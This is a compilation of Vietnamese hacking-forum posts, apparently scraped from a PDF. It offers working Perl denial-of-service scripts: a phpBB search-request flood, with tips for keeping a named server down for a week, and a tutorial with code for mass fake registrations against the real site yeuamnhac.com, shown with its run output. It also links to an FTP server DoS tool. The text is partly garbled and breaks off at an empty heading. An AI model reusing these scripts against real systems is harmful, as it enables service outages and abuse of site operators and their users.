Cái này chỉ có tác dụng đối với các Server có ổ đĩa mềm Chính vì vậy mà nó dùng để DoS các server của Việt Nam là hay nhất.. Vì thông thương ổ mềm chẳng được bảo vệ gì sất Tôi đã flood y
Trang 1+$x+&search_terms=any&search_author=&search_forum=-
1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=800";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nCo loi xay ra: $!\n" unless $sock;
## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6;
en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## exploit phpbb by SpiderZ
syswrite STDOUT, ".";
## exploit phpbb by SpiderZ
$x++;
}
# www.spiderz.tk [2006]
Trang 2edi 2 cài này là đc
HTML Code:
$host = "svvn.ru";
$pth = "/forum/";
tip: để dos liên tục, rek tạo 1 file dos.bat trong đó thì cứ perl dos.pl copy 100 lần
> server down 1 tuần :p
rekcor (vniss)
FTP Server DoS
Các bạn down cái file này về : http://itvn4all.com/ftpserver_dos.zip
Giải nén và chạy cái file trong đó
Cái này chỉ có tác dụng đối với các Server có ổ đĩa mềm
Chính vì vậy mà nó dùng để DoS các server của Việt Nam là hay nhất Vì thông thương ổ mềm chẳng được bảo vệ gì sất
Tôi đã flood yeuamnhac.com như thế nào
Đã lâu lắm rồi tôi không còn hứng thú về hacking và security, nhưng chỉ với vài lời động viên của MicrosoftX, DCH quyết định quay trở lại với giới underground mà lâu nay đã lãng quên Mở đầu cho cái ngày trọng đại ấy là việc flood
yeuamnhac.com
Sự việc ở đây là yeuamnhac đã chủ quan với việc nâng cấp lên vBB bản mới nhất
nhưng webmaster lại quên turn on phần Image Verification đây chính là mấu
chốt của vấn đề
Ở đây tôi xin giới thiệu chương trình dùng để sniff packet rất nổi tiếng (đã từng
được giới thiệu trong security365) Ethereal - Network Protocol Analyzer
Ở đây xin nói rõ thêm về việc sử dụng Ethereal - Network Protocol Analyzer, nếu chỉ dùng riêng http header thì dễ mất thời gian và bị bỏ sót riêng tôi nhiều lần view source-code để lấy các hidden GET, ngay trong ví dụ này là việc nhanh
chóng bị bỏ quên đọan agree rule:
s=&do=register&url=$host$dir&nth=0&day=0&year=0&wh o=adult&agree=1
* Thứ 2 việc đọc qua Ethereal, các bạn xem ảnh, được trình bày khá kỹ càng và có nhiều description bên cạnh lọc bớt những đọan không cần thiết Packet được sniff chặt chẽ, dễ dàng manage được những gì ta đã gửi lên server và toàn bộ những gì được nhận lại từ server
* Tôi khi vòng quanh 1 target thì công cụ không thể thiếu vẫn là ethereal, chỉ 1 lúc
Trang 3lòng vòng lướt qua 1 target là sẽ có vô số gói tin bắt được đầy phong phú mọi người chưa dùng chưa hiểu hết được đâu :p
* Có thể topic trên có phương pháp flood quá noob, tùy vào trình độ của người đọc Mong bài viết sẽ có ích với những newbie như tôi
Đầu tiên ta sẽ sniff các phần đã được hidden để send tới server yeuamnhac, ở đây tôi highlight 2 đọan sau :
Code:
s=&do=register&url=$host$dir&nth=0&day=0&year=0&who=adult&agree=1
Để vượt qua phần Agree rule
Code:
s=&do=addmember&url=http%3A%2F%2Fwww.yeuamnhac.com%2Fmusic%2F
&agree=1&password_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&passwordconfir m_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&username=dinhcaohack&password
=&passwordconfirm=&email=dinhcaohack@yahoo.com&emailconfirm=dinhcaoh ack@yahoo.com&userfield%5Bfield5%5D=1&userfield%5Bfield5_set%5D=1&u serfield%5Bfield2%5D=HN&userfield%5Bfield2_set%5D=1&month=03&day=04
&year=1981&oldbirthday=&showbirthday=2&timezoneoffset=7&dst=2&options
%5Badminemail%5D=1
http://rekcor.info/TUT_YAN/YAN3.JPG
http://rekcor.info/TUT_YAN/YAN4.JPG
Để ý rằng username bắt buộc phải > 6 chữ số
password đã được mã hóa hash 2 lần (md5(md5(x).salt)
email và email confirm
Như vậy không hề có phần image confirmation nên có thể dễ dàng flood members nhanh chóng qua code perl sau :
PHP Code:
#!/usr/bin/perl
use IO::Socket;
$host = "www.yeuamnhac.com";
$dir = "music";
$times = 999999;
$u_root_root = "HACKED_BY_DINHCAOHACK";
print "[+] Bat dau tan cong $host.$dir.voi so lan flood.$times \n";
for($i=1;$i<=$times;$i++) {
$h = $i++;
$u_rootser = $u_root.$h;
$mail = "$u_rootser%40HACKED_BY_DINHCAOHACK$i.com";
Trang 4$post1 = "s=&do=register&url=$host$dir&nth=0&day=0&year=0&who=adult&ag ree=1";
$post2 = "s=&do=addmember&url=http%3A%2F%2Fwww.yeuamnhac.com%2F music%2F&agree=1&password_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&pass wordconfirm_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&username=$u_rootser& password=&passwordconfirm=&email=$mail&emailconfirm=$mail&userfield%5 Bfield5%5D=1&userfield%5Bfield5_set%5D=1&userfield%5Bfield2%5D=HN&u serfield%5Bfield2_set%5D=1&month=03&day=04&year=1981&oldbirthday=&sh owbirthday=2&timezoneoffset=7&dst=2&options%5Badminemail%5D=1";
print "[+] $u_rootser da duoc thiep lap !\n";
$ss =
IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die
"[-] Khong the ket noi";
print $ss "POST /music/register.php?do=addmember HTTP/1.1\r\n";
print $ss "Host: $host\n";
print $ss "Content-Type: application/x-www-form-urlencoded\n";
print $ss "Content-length: ".length($post1)."\r\n\r\n";
print $ss "$post1";
print $ss "\r\n\r\n";
$ss =
IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die
"[-] Khong the ket noi";
print $ss "POST /music/register.php?do=addmember HTTP/1.1\r\n";
print $ss "Host: $host\n";
print $ss "Content-Type: application/x-www-form-urlencoded\n";
print $ss "Content-length: ".length($post2)."\r\n\r\n";
print $ss "$post2";
print $ss "\r\n\r\n";
sleep 2;
}
print "[+] Flooded Succesfully \n";
Để ý rằng nếu 0 có hàm flood server MySQL dễ bị sụp nhanh và tất nhiên cũng phục hồi nhanh
-> Hàm sleep để cho khi anh em flood tác dụng chậm đi nhưng có tác dụng hơn Kết quả :
Code:
-bash-2.05b$ perl dos.pl
Trang 5[+] Bat dau tan cong www.yeuamnhac.com.music.voi so lan flood.999999
[+] HACKED_BY_DINHCAOHACK1 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK3 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK5 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK7 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK9 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK11 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK13 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK15 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK17 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK19 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK21 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK23 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK25 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK27 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK29 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK31 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK33 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK35 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK37 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK39 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK41 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK43 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK45 da duoc thiep lap !
[+] HACKED_BY_DINHCAOHACK47 da duoc thiep lap !
http://rekcor.info/TUT_YAN/YAN1.JPG
http://rekcor.info/TUT_YAN/YAN2.JPG
P.S : Gửi đến YAN
Mình không biết YM! admin nên không thể report được dù gì thì sau vụ này YAN cũng được thêm khối thành viên nhé
Admin chỉ cần thêm vào mỗi Image Verification thôi
Quà tặng trên gửi đến yeuamnhac.vn -> Thanks quantalon for his HAO's DB
dinhcaohack (vniss)
Invision Power Board Multiple Users DOS
PHP Code: